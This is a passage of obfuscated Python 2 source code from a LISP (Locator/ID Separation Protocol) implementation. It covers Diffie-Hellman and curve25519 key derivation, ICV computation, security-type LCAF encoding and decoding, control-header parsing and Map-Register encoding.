            I1111I1i1i = struct.pack("I", (i1Oo >> 64) & LISP_4_32_MASK)
            O0oOo = struct.pack("Q", i1Oo & LISP_8_64_MASK)
            i1Oo = I1111I1i1i + O0oOo
        else:
            i1Oo = struct.pack("QQ", i1Oo >> 64, i1Oo & LISP_8_64_MASK)
        return (i1Oo)
    if 14 - 14: I1Ii111 + I1Ii111 / OoOoOO00 + OoOoOO00 * ooOoO0o / I1Ii111
    if 68 - 68: OoooooooOO
    def key_length(self, key):
        # Byte length of a hex-encoded key (Python 2 integer division).
        if (type(key) != str): key = self.normalize_pub_key(key)
        return (len(key) / 2)
    if 38 - 38: iII111i + ooOoO0o
    if 32 - 32: ooOoO0o - OoooooooOO + OoO0O00
    def print_key(self, key):
        # "0xABCD...WXYZ(len)" summary form used in log lines.
        OOOo0Oo0O = self.normalize_pub_key(key)
        return ("0x{}...{}({})".format(OOOo0Oo0O[0:4], OOOo0Oo0O[-4::], self.key_length(OOOo0Oo0O)))
    if 90 - 90: I1ii11iIi11i / OoooooooOO % i11iIiiIii - IiII
    if 30 - 30: iII111i
    def normalize_pub_key(self, key):
        """Return the key as a hex string: curve25519 byte-strings are
        hexlified, integers are zero-filled to 256 hex digits."""
        if (type(key) == str):
            if (self.curve25519): return (binascii.hexlify(key))
            return (key)
        if 44 - 44: OoOoOO00 . OOooOOo
        key = lisp_hex_string(key).zfill(256)
        return (key)
    if 84 - 84: I1Ii111 - I11i * OoOoOO00
    if 52 - 52: iII111i . IiII - I1ii11iIi11i * iIii1I11I1II1 % o0oOOo0O0Ooo / ooOoO0o
    def print_keys(self, do_bold=True):
        # One-line summary: cipher suite plus local/remote public keys.
        I1111III111ii = bold("local-key: ", False) if do_bold else "local-key: "
        if (self.local_public_key == None):
            I1111III111ii += "none"
        else:
            I1111III111ii += self.print_key(self.local_public_key)
        if 18 - 18: OoOoOO00 % oO0o % OoO0O00 / iII111i
        i11iII1IiI = bold("remote-key: ", False) if do_bold else "remote-key: "
        if (self.remote_public_key == None):
            i11iII1IiI += "none"
        else:
            i11iII1IiI += self.print_key(self.remote_public_key)
        if 88 - 88: iII111i * OOooOOo / i11iIiiIii / i1IIi
        O0O00O0O0 = "ECDH" if (self.curve25519) else "DH"
        ii1IiIi1iIi = self.cipher_suite
        return ("{} cipher-suite: {}, {}, {}".format(O0O00O0O0, ii1IiIi1iIi, I1111III111ii, i11iII1IiI))
    if 16 - 16: OOooOOo % I1IiiI . I1Ii111 * OoO0O00 % O0 . OOooOOo
    if 94 - 94: I1ii11iIi11i
    def compare_keys(self, keys):
        # True when the DH parameters and remote public key all match.
        if (self.dh_g_value != keys.dh_g_value): return (False)
        if (self.dh_p_value != keys.dh_p_value): return (False)
        if (self.remote_public_key != keys.remote_public_key): return (False)
        return (True)
    if 33 - 33: I1ii11iIi11i + I1ii11iIi11i . Ii1I
    if 27 - 27: II111iiii - i11iIiiIii - OoooooooOO
    def compute_public_key(self):
        """Return the public half of the local keypair: curve25519 public
        bytes, or g^x mod p for classic DH."""
        if (self.curve25519): return (self.curve25519.get_public().public)
        if 90 - 90: I1IiiI
        ii1i1I1111ii = self.local_private_key
        i11ii = self.dh_g_value
        III1I1Iii1 = self.dh_p_value
        return (int((i11ii ** ii1i1I1111ii) % III1I1Iii1))
    if 34 - 34: oO0o - II111iiii - o0oOOo0O0Ooo + iII111i + I1Ii111
    if 70 - 70: OoooooooOO + OoO0O00 * Oo0Ooo
    def compute_shared_key(self, ed, print_shared=False):
        """
        Derive the shared secret from the local private key and the peer's
        public key ('ed' is a log tag such as encap/decap), then derive the
        encrypt/ICV keys and bump the rekey bookkeeping.
        """
        ii1i1I1111ii = self.local_private_key
        IiIi11iI1 = self.remote_public_key
        if 50 - 50: iIii1I11I1II1 + I1Ii111 - I11i - OoooooooOO
        oO00O0oO = bold("Compute {} shared-key".format(ed), False)
        lprint("{}, key-material: {}".format(oO00O0oO, self.print_keys()))
        if 69 - 69: OOooOOo + OOooOOo * Ii1I * I11i + I1IiiI
        if (self.curve25519):
            ii1i11iiII = curve25519.Public(IiIi11iI1)
            self.shared_key = self.curve25519.get_shared_key(ii1i11iiII)
        else:
            III1I1Iii1 = self.dh_p_value
            self.shared_key = (IiIi11iI1 ** ii1i1I1111ii) % III1I1Iii1
        if 40 - 40: iII111i
        if 62 - 62: ooOoO0o / OOooOOo
        if 74 - 74: iII111i % I1Ii111 / I1Ii111 - iIii1I11I1II1 - II111iiii + OOooOOo
        if 92 - 92: I11i % I1Ii111
        if 18 - 18: ooOoO0o + I1Ii111 / OOooOOo / oO0o + iIii1I11I1II1 % IiII
        if 94 - 94: I11i
        if 37 - 37: oO0o
        # Optionally log the shared secret (debug use only).
        if (print_shared):
            OOOo0Oo0O = self.print_key(self.shared_key)
            lprint("Computed shared-key: {}".format(OOOo0Oo0O))
        if 52 - 52: I1ii11iIi11i * I1IiiI . OOooOOo + i1IIi % oO0o / iIii1I11I1II1
        if 68 - 68: I1Ii111 - OoOoOO00 . i11iIiiIii + o0oOOo0O0Ooo
        if 71 - 71: i11iIiiIii / i1IIi * I1IiiI / OoOoOO00
        if 33 - 33: I11i . Oo0Ooo
        if 89 - 89: iII111i + i1IIi - IiII + ooOoO0o . II111iiii
        self.compute_encrypt_icv_keys()
        if 85 - 85: iIii1I11I1II1 - Ii1I * Oo0Ooo . oO0o + I1Ii111
        if 13 - 13: O0 + iIii1I11I1II1 % II111iiii + iIii1I11I1II1
        if 85 - 85: I1IiiI * iIii1I11I1II1 . iII111i / iII111i
        if 43 - 43: I1IiiI
        self.rekey_count += 1
        self.last_rekey = lisp_get_timestamp()
    if 78 - 78: OoO0O00 % II111iiii + OoOoOO00 / I1IiiI
    if 34 - 34: o0oOOo0O0Ooo % I1ii11iIi11i + Ii1I * I11i / oO0o
    def compute_encrypt_icv_keys(self):
        """
        KDF: HMAC-SHA256 over the shared secret, keyed by a context string
        built from the XOR of both public keys.  The top 128 bits of the
        digest become the encrypt key, the bottom 128 bits the ICV key.
        """
        i111Iii11i1Ii = hashlib.sha256
        if (self.curve25519):
            oo00000ooOooO = self.shared_key
        else:
            oo00000ooOooO = lisp_hex_string(self.shared_key)
        if 56 - 56: I1IiiI . IiII
        if 53 - 53: ooOoO0o - OoOoOO00 + IiII
        if 100 - 100: oO0o + OoO0O00
        if 95 - 95: i11iIiiIii . o0oOOo0O0Ooo + OoooooooOO % Oo0Ooo
        if 21 - 21: iII111i - o0oOOo0O0Ooo / I11i % O0 / iIii1I11I1II1 / iII111i
        # Both public keys as integers (Python 2 'long') for the XOR.
        I1111III111ii = self.local_public_key
        if (type(I1111III111ii) != long): I1111III111ii = int(binascii.hexlify(I1111III111ii), 16)
        i11iII1IiI = self.remote_public_key
        if (type(i11iII1IiI) != long): i11iII1IiI = int(binascii.hexlify(i11iII1IiI), 16)
        iIiii1Ii = "0001" + "lisp-crypto" + lisp_hex_string(I1111III111ii ^ i11iII1IiI) + "0100"
        if 17 - 17: O0 - Ii1I + IiII
        iIIII11iII = hmac.new(iIiii1Ii, oo00000ooOooO, i111Iii11i1Ii).hexdigest()
        iIIII11iII = int(iIIII11iII, 16)
        if 78 - 78: IiII + I11i - o0oOOo0O0Ooo + OoO0O00 / iIii1I11I1II1
        if 47 - 47: OOooOOo
        if 20 - 20: I1Ii111 % ooOoO0o - I1Ii111 * OoooooooOO / I1ii11iIi11i
        if 57 - 57: IiII % I11i * OOooOOo % I1ii11iIi11i
        oooO0oO0 = (iIIII11iII >> 128) & LISP_16_128_MASK
        IIII1 = iIIII11iII & LISP_16_128_MASK
        self.encrypt_key = lisp_hex_string(oooO0oO0).zfill(32)
        # poly1305 wants a 32-hex-digit ICV key; otherwise 40 digits.
        oo0Ooo00O0o = 32 if self.do_poly else 40
        self.icv_key = lisp_hex_string(IIII1).zfill(oo0Ooo00O0o)
    if 45 - 45: OoO0O00 * OoooooooOO / O0 . I1Ii111 / OoOoOO00
    if 53 - 53: OoOoOO00 . I1IiiI * I1ii11iIi11i
    def do_icv(self, packet, nonce):
        """Return the hex ICV over 'packet': poly1305aes when configured,
        otherwise HMAC truncated to the first 40 hex digits.  Empty string
        when no ICV key has been derived yet."""
        if (self.icv_key == None): return ("")
        if (self.do_poly):
            Oo00 = self.icv.poly1305aes
            I11Ii1I11IIIIi1 = self.icv.binascii.hexlify
            nonce = I11Ii1I11IIIIi1(nonce)
            ooOOo000 = Oo00(self.encrypt_key, self.icv_key, nonce, packet)
            ooOOo000 = I11Ii1I11IIIIi1(ooOOo000)
        else:
            ii1i1I1111ii = binascii.unhexlify(self.icv_key)
            ooOOo000 = hmac.new(ii1i1I1111ii, packet, self.icv).hexdigest()
            ooOOo000 = ooOOo000[0:40]
        if 77 - 77: I1IiiI / I1Ii111
        return (ooOOo000)
    if 65 - 65: I1ii11iIi11i * O0 . OoooooooOO * I11i / IiII
    if 87 - 87: iIii1I11I1II1
    def add_key_by_nonce(self, nonce):
        # Slot this key into the global nonce table; the 4-entry list is
        # indexed by key-id (Python 2 dict.has_key).
        if (lisp_crypto_keys_by_nonce.has_key(nonce) == False):
            lisp_crypto_keys_by_nonce[nonce] = [None, None, None, None]
        if 58 - 58: I1ii11iIi11i % i11iIiiIii + OoOoOO00 / I11i - OoooooooOO
        lisp_crypto_keys_by_nonce[nonce][self.key_id] = self
    if 62 - 62: OoO0O00 . OoOoOO00
    if 22 - 22: ooOoO0o . i11iIiiIii . OoooooooOO . i1IIi
    def delete_key_by_nonce(self, nonce):
        # Drop all key-ids stored for 'nonce', if present.
        if (lisp_crypto_keys_by_nonce.has_key(nonce) == False): return
        lisp_crypto_keys_by_nonce.pop(nonce)
    if 12 - 12: OoOoOO00 % OOooOOo + oO0o . O0 % iIii1I11I1II1
    if 41 - 41: OoooooooOO
    def add_key_by_rloc(self, addr_str, encap):
        # Store this key in the encap or decap per-RLOC table.
        I1I111i = lisp_crypto_keys_by_rloc_encap if encap else lisp_crypto_keys_by_rloc_decap
        if 63 - 63: I1ii11iIi11i . I1IiiI + OOooOOo - IiII + iII111i
        if 78 - 78: Ii1I
        if (I1I111i.has_key(addr_str) == False):
            I1I111i[addr_str] = [None, None, None, None]
        if 29 - 29: II111iiii
        I1I111i[addr_str][self.key_id] = self
        if 79 - 79: iIii1I11I1II1 - i11iIiiIii + ooOoO0o - II111iiii . iIii1I11I1II1
        if 84 - 84: Oo0Ooo % I11i * O0 * I11i
        if 66 - 66: OOooOOo / iIii1I11I1II1 - OoOoOO00 % O0 . ooOoO0o
        if 12 - 12: Oo0Ooo + I1IiiI
        if 37 - 37: i1IIi * i11iIiiIii
        # Decap keys are also pushed to the data-plane via IPC.
        if (encap == False):
            lisp_write_ipc_decap_key(addr_str, I1I111i[addr_str])
    if 95 - 95: i11iIiiIii % I1Ii111 * Oo0Ooo + i1IIi . O0 + I1ii11iIi11i
    if 7 - 7: OoO0O00 * i11iIiiIii * iIii1I11I1II1 / OOooOOo / I1Ii111
    if 35 - 35: iII111i * OOooOOo
    def encode_lcaf(self, rloc_addr):
        """Return a packed Security-Type LCAF carrying the local public key,
        optionally followed by rloc_addr's AFI and packed address."""
        ooooO0OO0O = self.normalize_pub_key(self.local_public_key)
        IiI11 = self.key_length(ooooO0OO0O)
        iiIi = (6 + IiI11 + 2)
        if (rloc_addr != None): iiIi += rloc_addr.addr_length()
        if 84 - 84: iIii1I11I1II1 + I1ii11iIi11i
        IIii1i = struct.pack("HBBBBHBB", socket.htons(LISP_AFI_LCAF), 0, 0,
            LISP_LCAF_SECURITY_TYPE, 0, socket.htons(iiIi), 1, 0)
        if 77 - 77: i11iIiiIii - I1Ii111 . I1ii11iIi11i % Oo0Ooo . Ii1I
        if 9 - 9: o0oOOo0O0Ooo
        if 55 - 55: OOooOOo % iIii1I11I1II1 + I11i . ooOoO0o
        if 71 - 71: i11iIiiIii / i1IIi + OoOoOO00
        if 23 - 23: i11iIiiIii
        if 88 - 88: II111iiii - iII111i / OoooooooOO
        # Cipher suite and key length precede the key material.
        ii1IiIi1iIi = self.cipher_suite
        IIii1i += struct.pack("BBH", ii1IiIi1iIi, 0, socket.htons(IiI11))
        if 71 - 71: I1ii11iIi11i
        if 19 - 19: Oo0Ooo - OoO0O00 + i11iIiiIii / iIii1I11I1II1
        if 1 - 1: IiII % i1IIi
        if 41 - 41: OoO0O00 * OoO0O00 / iII111i + I1ii11iIi11i . o0oOOo0O0Ooo
        # Pack the hex key 64 bits (16 hex digits) at a time, byte-swapped.
        for IiIIi1IiiIiI in range(0, IiI11 * 2, 16):
            ii1i1I1111ii = int(ooooO0OO0O[IiIIi1IiiIiI:IiIIi1IiiIiI + 16], 16)
            IIii1i += struct.pack("Q", byte_swap_64(ii1i1I1111ii))
        if 84 - 84: i11iIiiIii + OoO0O00 * I1IiiI + I1ii11iIi11i / Ii1I
        if 80 - 80: I1ii11iIi11i
        if 67 - 67: II111iiii
        if 2 - 2: o0oOOo0O0Ooo - O0 * Ii1I % IiII
        if 64 - 64: i1IIi . ooOoO0o
        if (rloc_addr):
            IIii1i += struct.pack("H", socket.htons(rloc_addr.afi))
            IIii1i += rloc_addr.pack_address()
        if 7 - 7: oO0o . iII111i - iII111i / I1Ii111 % Oo0Ooo
        return (IIii1i)
    if 61 - 61: oO0o - I1ii11iIi11i / iII111i % I1ii11iIi11i + OoO0O00 / Oo0Ooo
    if 10 - 10: i11iIiiIii / OoOoOO00
    def decode_lcaf(self, packet, lcaf_len):
        """
        Parse a Security-Type LCAF from 'packet', storing the remote public
        key and cipher suite on self.  Returns the remaining packet bytes,
        None when the buffer is too short; a non-security LCAF is skipped
        over and the bytes after it are returned.
        """
        if 27 - 27: I1IiiI / OoooooooOO
        if 74 - 74: I1ii11iIi11i % I1Ii111 - OoO0O00 * I11i . OoooooooOO * OoO0O00
        if 99 - 99: OoOoOO00 . iII111i - OoooooooOO - O0
        if 6 - 6: OOooOOo
        # lcaf_len == 0 means the LCAF header has not been consumed yet.
        if (lcaf_len == 0):
            O00oO00oOO00O = "HHBBH"
            ooOoooOoo0oO = struct.calcsize(O00oO00oOO00O)
            if (len(packet) < ooOoooOoo0oO): return (None)
            if 3 - 3: O0 - I1Ii111 * Ii1I * OOooOOo / Ii1I
            O000oOOoOOO, O0Ooo000OO00, O000oo0O0OO0, O0Ooo000OO00, lcaf_len = struct.unpack(O00oO00oOO00O, packet[:ooOoooOoo0oO])
            if 58 - 58: OoO0O00 - OoooooooOO . iII111i
            if 26 - 26: OoOoOO00
            if (O000oo0O0OO0 != LISP_LCAF_SECURITY_TYPE):
                packet = packet[lcaf_len + 6::]
                return (packet)
            if 48 - 48: iII111i
            lcaf_len = socket.ntohs(lcaf_len)
            packet = packet[ooOoooOoo0oO::]
        if 85 - 85: I1ii11iIi11i . oO0o . O0
        if 16 - 16: I1ii11iIi11i % I1ii11iIi11i % I1Ii111 + I11i . I1Ii111 + OOooOOo
        if 85 - 85: i11iIiiIii . I11i + Ii1I / Ii1I
        if 43 - 43: IiII . OoooooooOO - II111iiii
        if 90 - 90: I1IiiI - iIii1I11I1II1 + I1ii11iIi11i * OOooOOo * oO0o
        if 19 - 19: I1Ii111 * II111iiii % Oo0Ooo - i1IIi
        # Security-type body: key count, cipher suite, key length.
        O000oo0O0OO0 = LISP_LCAF_SECURITY_TYPE
        O00oO00oOO00O = "BBBBH"
        ooOoooOoo0oO = struct.calcsize(O00oO00oOO00O)
        if (len(packet) < ooOoooOoo0oO): return (None)
        if 27 - 27: OoOoOO00 . O0 / I1ii11iIi11i . iIii1I11I1II1
        I11IIi, O0Ooo000OO00, ii1IiIi1iIi, O0Ooo000OO00, IiI11 = struct.unpack(O00oO00oOO00O,
            packet[:ooOoooOoo0oO])
        if 51 - 51: i1IIi % o0oOOo0O0Ooo - oO0o - IiII
        if 14 - 14: ooOoO0o + Ii1I
        if 45 - 45: oO0o + II111iiii . iII111i / I1ii11iIi11i
        if 76 - 76: Ii1I + iII111i - IiII * iIii1I11I1II1 % i1IIi
        if 72 - 72: ooOoO0o + II111iiii . O0 - iII111i / OoooooooOO . I1Ii111
        if 28 - 28: iIii1I11I1II1 . O0
        packet = packet[ooOoooOoo0oO::]
        IiI11 = socket.ntohs(IiI11)
        if (len(packet) < IiI11): return (None)
        if 32 - 32: OoooooooOO
        if 29 - 29: I1ii11iIi11i
        if 41 - 41: Ii1I
        if 49 - 49: Ii1I % II111iiii . Ii1I - o0oOOo0O0Ooo - I11i * IiII
        # Reject unknown cipher suites but still consume the key bytes.
        Iii = [LISP_CS_25519_CBC, LISP_CS_25519_GCM, LISP_CS_25519_CHACHA,
            LISP_CS_1024]
        if (ii1IiIi1iIi not in Iii):
            lprint("Cipher-suites {} supported, received {}".format(Iii,
                ii1IiIi1iIi))
            packet = packet[IiI11::]
            return (packet)
        if 52 - 52: iII111i % I1Ii111 - I1Ii111 - oO0o - iII111i - i1IIi
        if 98 - 98: OoO0O00 - Oo0Ooo * I1IiiI
        self.cipher_suite = ii1IiIi1iIi
        if 90 - 90: I1IiiI
        if 27 - 27: iIii1I11I1II1 - oO0o
        if 73 - 73: OOooOOo . Oo0Ooo + Oo0Ooo % Oo0Ooo % O0
        if 8 - 8: iII111i . Ii1I - i1IIi % OoO0O00 / I11i
        if 13 - 13: Oo0Ooo / OoOoOO00 . I1ii11iIi11i . OOooOOo
        # Accumulate the key 64 bits at a time (byte-swapped on the wire).
        ooooO0OO0O = 0
        for IiIIi1IiiIiI in range(0, IiI11, 8):
            ii1i1I1111ii = byte_swap_64(struct.unpack("Q", packet[IiIIi1IiiIiI:IiIIi1IiiIiI + 8])[0])
            ooooO0OO0O <<= 64
            ooooO0OO0O |= ii1i1I1111ii
        if 31 - 31: o0oOOo0O0Ooo
        self.remote_public_key = ooooO0OO0O
        if 59 - 59: Oo0Ooo / Oo0Ooo
        if 87 - 87: I1ii11iIi11i % OoOoOO00 + Ii1I . i11iIiiIii / Ii1I
        if 32 - 32: Ii1I + IiII + I1ii11iIi11i
        if 79 - 79: i1IIi / Ii1I
        if 81 - 81: iIii1I11I1II1
        # curve25519 wants the key as a 32-byte binary string, not an int.
        if (self.curve25519):
            ii1i1I1111ii = lisp_hex_string(self.remote_public_key)
            ii1i1I1111ii = ii1i1I1111ii.zfill(64)
            o000oO0oOOO = ""
            for IiIIi1IiiIiI in range(0, len(ii1i1I1111ii), 2):
                o000oO0oOOO += chr(int(ii1i1I1111ii[IiIIi1IiiIiI:IiIIi1IiiIiI + 2], 16))
            if 23 - 23: OOooOOo
            self.remote_public_key = o000oO0oOOO
        if 68 - 68: OoooooooOO
        if 18 - 18: Ii1I * OoO0O00
        packet = packet[IiI11::]
        return (packet)
if 89 - 89: OoO0O00 + oO0o % iIii1I11I1II1 + I11i / O0
if 38 - 38: ooOoO0o - o0oOOo0O0Ooo - O0 + ooOoO0o % OoOoOO00 . o0oOOo0O0Ooo
if 40 - 40: iIii1I11I1II1 * OoooooooOO * I1Ii111 - Ii1I + i11iIiiIii
if 81 - 81: OoO0O00 * OoooooooOO / iII111i
if 8 - 8: O0 * i1IIi - OoOoOO00 % I1IiiI / I1ii11iIi11i
if 39 - 39: I1ii11iIi11i . oO0o * II111iiii + I1IiiI - iIii1I11I1II1
if 56 - 56: IiII - Ii1I + i11iIiiIii * OoO0O00 % I1IiiI
if 37 - 37: iIii1I11I1II1 + IiII / I1Ii111 . OoooooooOO
class lisp_thread():
    """
    Per-thread bookkeeping handed to pcap/worker threads: a name, thread
    counts, an input queue with statistics, and a reusable packet object.
    """

    def __init__(self, name):
        # Identity: name is fixed, the number is assigned later (-1 = unset).
        self.thread_name = name
        self.thread_number = -1
        # Pool sizing, filled in by the caller after construction.
        self.number_of_pcap_threads = 0
        self.number_of_worker_threads = 0
        # Work queue plus stats for packets handed to this thread.
        self.input_queue = Queue.Queue()
        self.input_stats = lisp_stats()
        # Reusable packet object to avoid per-packet allocation.
        self.lisp_packet = lisp_packet(None)
if 72 - 72: oO0o % ooOoO0o % OOooOOo
if 63 - 63: OoO0O00 . Ii1I % II111iiii / I11i - OoOoOO00
if 4 - 4: Oo0Ooo - O0 / I11i + O0 - oO0o * Oo0Ooo
if 25 - 25: I1IiiI
if 64 - 64: oO0o
if 80 - 80: o0oOOo0O0Ooo % iIii1I11I1II1
if 63 - 63: IiII * i11iIiiIii
if 86 - 86: I11i % I11i - OoOoOO00 + I1Ii111 / I1IiiI * OoooooooOO
if 26 - 26: II111iiii * iII111i + o0oOOo0O0Ooo / O0 + i1IIi - I11i
if 56 - 56: OOooOOo
if 76 - 76: i1IIi % iIii1I11I1II1 - o0oOOo0O0Ooo + IiII - I11i
if 81 - 81: I1ii11iIi11i + OoooooooOO - OOooOOo * O0
if 100 - 100: iIii1I11I1II1 - OoOoOO00
if 28 - 28: Oo0Ooo . O0 . I11i
if 60 - 60: II111iiii + I1Ii111 / oO0o % OoooooooOO - i1IIi
if 57 - 57: ooOoO0o
if 99 - 99: Oo0Ooo + I1Ii111 % ooOoO0o - o0oOOo0O0Ooo
if 52 - 52: I1ii11iIi11i
class lisp_control_header():
    """
    Common header of a LISP control message (the first 12 bytes).

    decode() extracts the message type, record count, nonce, and the
    type-specific flag bits; the is_*() helpers expose those flags.
    """

    def __init__(self):
        self.type = 0
        self.record_count = 0
        self.nonce = 0
        # Map-Request flags.
        self.rloc_probe = False
        self.smr_bit = False
        self.smr_invoked_bit = False
        # ECM (Encapsulated Control Message) flags.
        self.ddt_bit = False
        self.to_etr = False
        self.to_ms = False
        # NAT-traversal Info flag.
        self.info_reply = False

    def decode(self, packet):
        """Parse the fixed header from 'packet'; False when it is too short."""
        layout = "BBBBQ"
        needed = struct.calcsize(layout)
        if (len(packet) < needed):
            return (False)

        first, second, _, self.record_count, self.nonce = struct.unpack(
            layout, packet[:needed])

        # Message type lives in the top nibble; flag bits depend on type.
        self.type = first >> 4
        if (self.type == LISP_MAP_REQUEST):
            self.smr_bit = (first & 0x01) != 0
            self.rloc_probe = (first & 0x02) != 0
            self.smr_invoked_bit = (second & 0x40) != 0

        if (self.type == LISP_ECM):
            self.ddt_bit = (first & 0x04) != 0
            self.to_etr = (first & 0x02) != 0
            self.to_ms = (first & 0x01) != 0

        if (self.type == LISP_NAT_INFO):
            self.info_reply = (first & 0x08) != 0

        return (True)

    def is_info_request(self):
        # NAT-Info message that is not an Info-Reply.
        if (self.type != LISP_NAT_INFO): return (False)
        return (self.is_info_reply() == False)

    def is_info_reply(self):
        return (bool(self.info_reply))

    def is_rloc_probe(self):
        return (bool(self.rloc_probe))

    def is_smr(self):
        return (bool(self.smr_bit))

    def is_smr_invoked(self):
        return (bool(self.smr_invoked_bit))

    def is_ddt(self):
        return (bool(self.ddt_bit))

    def is_to_etr(self):
        return (bool(self.to_etr))

    def is_to_ms(self):
        return (bool(self.to_ms))
if 9 - 9: IiII . I11i
if 23 - 23: O0 % OoooooooOO - O0 . I1IiiI + i11iIiiIii
if 96 - 96: ooOoO0o % O0
if 51 - 51: I1IiiI - iII111i / I1ii11iIi11i . I1ii11iIi11i + I1ii11iIi11i
if 87 - 87: II111iiii . Ii1I * OoO0O00
if 74 - 74: o0oOOo0O0Ooo % OoOoOO00 . iII111i % I1Ii111 . O0 % II111iiii
if 5 - 5: oO0o - OoooooooOO / OoOoOO00
if 30 - 30: I11i % o0oOOo0O0Ooo + i1IIi * OoooooooOO * OoO0O00 - II111iiii
if 55 - 55: OoO0O00
if 20 - 20: ooOoO0o * I1Ii111 * o0oOOo0O0Ooo - ooOoO0o
if 32 - 32: Ii1I * oO0o
if 85 - 85: i11iIiiIii . OoO0O00 + OoO0O00
if 28 - 28: Oo0Ooo
if 62 - 62: Oo0Ooo + OoooooooOO / iII111i
if 60 - 60: Ii1I / OoOoOO00 . I11i % OOooOOo
if 61 - 61: O0 . Ii1I . O0 * i11iIiiIii * II111iiii / I1Ii111
if 69 - 69: I11i
if 17 - 17: I11i
if 38 - 38: I1Ii111 % OOooOOo
if 9 - 9: O0 . iIii1I11I1II1
if 44 - 44: I1ii11iIi11i % IiII
if 6 - 6: OoO0O00
if 82 - 82: iIii1I11I1II1 . I11i / IiII / OOooOOo * II111iiii % oO0o
if 62 - 62: II111iiii
if 96 - 96: I11i % OoOoOO00 * I1ii11iIi11i
if 94 - 94: Oo0Ooo - i1IIi . O0 % Oo0Ooo . ooOoO0o
if 63 - 63: i11iIiiIii % I1ii11iIi11i % I1IiiI . IiII * o0oOOo0O0Ooo + OOooOOo
if 77 - 77: o0oOOo0O0Ooo
if 63 - 63: ooOoO0o * oO0o + ooOoO0o * Ii1I + Oo0Ooo / I1ii11iIi11i
if 15 - 15: O0 . I1ii11iIi11i * I1ii11iIi11i
if 65 - 65: I1Ii111 + O0 % o0oOOo0O0Ooo
if 72 - 72: OOooOOo . OoOoOO00 / II111iiii
if 69 - 69: OOooOOo * II111iiii - ooOoO0o - i1IIi + i11iIiiIii
if 50 - 50: OoooooooOO * i1IIi / oO0o
if 83 - 83: i1IIi
if 38 - 38: OoooooooOO * iIii1I11I1II1
if 54 - 54: OoooooooOO . I1Ii111
if 71 - 71: Ii1I
if 31 - 31: I11i . i11iIiiIii . OoO0O00 * Oo0Ooo % Ii1I . o0oOOo0O0Ooo
if 92 - 92: OoooooooOO / O0 * i1IIi + iIii1I11I1II1
if 93 - 93: ooOoO0o % I1Ii111
if 46 - 46: I1ii11iIi11i * OoOoOO00 * IiII * I1ii11iIi11i . I1ii11iIi11i
if 43 - 43: ooOoO0o . i1IIi
if 68 - 68: IiII % Oo0Ooo . O0 - OoOoOO00 + I1ii11iIi11i . i11iIiiIii
if 45 - 45: I1IiiI
if 17 - 17: OoooooooOO - ooOoO0o + Ii1I . OoooooooOO % Oo0Ooo
if 92 - 92: I1Ii111 - OOooOOo % OoO0O00 - o0oOOo0O0Ooo % i1IIi
if 38 - 38: I1ii11iIi11i . I11i / OoOoOO00 % I11i
if 10 - 10: O0 . I1IiiI * o0oOOo0O0Ooo / iII111i
class lisp_map_register():
    """A LISP Map-Register message (RFC 6833 section 4.3).

    Holds the header flag bits, nonce, authentication parameters and
    xTR-ID/site-ID trailer, and knows how to encode itself to and decode
    itself from its wire format.  Packet buffers are plain byte strings
    (Python 2 str), built with struct.pack().
    """

    def __init__(self):
        # Header flag bits, all cleared by default.
        self.proxy_reply_requested = False
        self.lisp_sec_present = False
        self.xtr_id_present = False
        self.map_notify_requested = False
        self.mobile_node = False
        self.merge_register_requested = False
        self.use_ttl_for_timeout = False
        self.map_register_refresh = False
        # Counters, nonce and authentication parameters.
        # (The original initialized record_count twice; once is enough.)
        self.record_count = 0
        self.nonce = 0
        self.alg_id = 0
        self.key_id = 0
        self.auth_len = 0
        self.auth_data = 0
        # Trailer identifiers and transport info.
        self.xtr_id = 0
        self.site_id = 0
        self.sport = 0
        self.encrypt_bit = 0
        self.encryption_key_id = None

    def print_map_register(self):
        """Log a one-line human-readable summary via lprint().

        Flag letters are upper-case when the bit is set, lower-case when
        clear.
        """
        xtr_id_str = lisp_hex_string(self.xtr_id)

        line = ("{} -> flags: {}{}{}{}{}{}{}{}{}, record-count: " +
            "{}, nonce: 0x{}, key/alg-id: {}/{}{}, auth-len: {}, xtr-id: " +
            "0x{}, site-id: {}")

        # NOTE(review): the "(sha1)/(sha2)" annotation tests self.key_id
        # against the *alg-id* constants; it likely was meant to test
        # self.alg_id.  Kept as-is (log cosmetics only) -- confirm intent.
        lprint(line.format(bold("Map-Register", False),
            "P" if self.proxy_reply_requested else "p",
            "S" if self.lisp_sec_present else "s",
            "I" if self.xtr_id_present else "i",
            "T" if self.use_ttl_for_timeout else "t",
            "R" if self.merge_register_requested else "r",
            "M" if self.mobile_node else "m",
            "N" if self.map_notify_requested else "n",
            "F" if self.map_register_refresh else "f",
            "E" if self.encrypt_bit else "e",
            self.record_count, lisp_hex_string(self.nonce), self.key_id,
            self.alg_id, " (sha1)" if (self.key_id == LISP_SHA_1_96_ALG_ID)
            else (" (sha2)" if (self.key_id == LISP_SHA_256_128_ALG_ID) else
            ""), self.auth_len, xtr_id_str, self.site_id))

    def encode(self):
        """Encode the Map-Register header.

        Returns the fixed header (type/flags word, nonce, key-id, alg-id,
        auth-len) followed by a zeroed authentication field.  The real
        authentication data is spliced in later via encode_auth().
        """
        first_long = (LISP_MAP_REGISTER << 28) | self.record_count
        if (self.proxy_reply_requested): first_long |= 0x08000000
        if (self.lisp_sec_present): first_long |= 0x04000000
        if (self.xtr_id_present): first_long |= 0x02000000
        if (self.map_register_refresh): first_long |= 0x1000
        if (self.use_ttl_for_timeout): first_long |= 0x800
        if (self.merge_register_requested): first_long |= 0x400
        if (self.mobile_node): first_long |= 0x200
        if (self.map_notify_requested): first_long |= 0x100
        if (self.encryption_key_id is not None):
            first_long |= 0x2000
            first_long |= self.encryption_key_id << 14

        # Derive the authentication-data length from the hash algorithm.
        if (self.alg_id == LISP_NONE_ALG_ID):
            self.auth_len = 0
        else:
            if (self.alg_id == LISP_SHA_1_96_ALG_ID):
                self.auth_len = LISP_SHA1_160_AUTH_DATA_LEN
            if (self.alg_id == LISP_SHA_256_128_ALG_ID):
                self.auth_len = LISP_SHA2_256_AUTH_DATA_LEN

        packet = struct.pack("I", socket.htonl(first_long))
        packet += struct.pack("QBBH", self.nonce, self.key_id, self.alg_id,
            socket.htons(self.auth_len))

        packet = self.zero_auth(packet)
        return (packet)

    def zero_auth(self, packet):
        """Splice a zeroed auth-data field (sized per alg_id) into packet."""
        offset = struct.calcsize("I") + struct.calcsize("QHH")
        auth_data = ""
        auth_len = 0
        if (self.alg_id == LISP_NONE_ALG_ID): return (packet)
        if (self.alg_id == LISP_SHA_1_96_ALG_ID):
            auth_data = struct.pack("QQI", 0, 0, 0)
            auth_len = struct.calcsize("QQI")
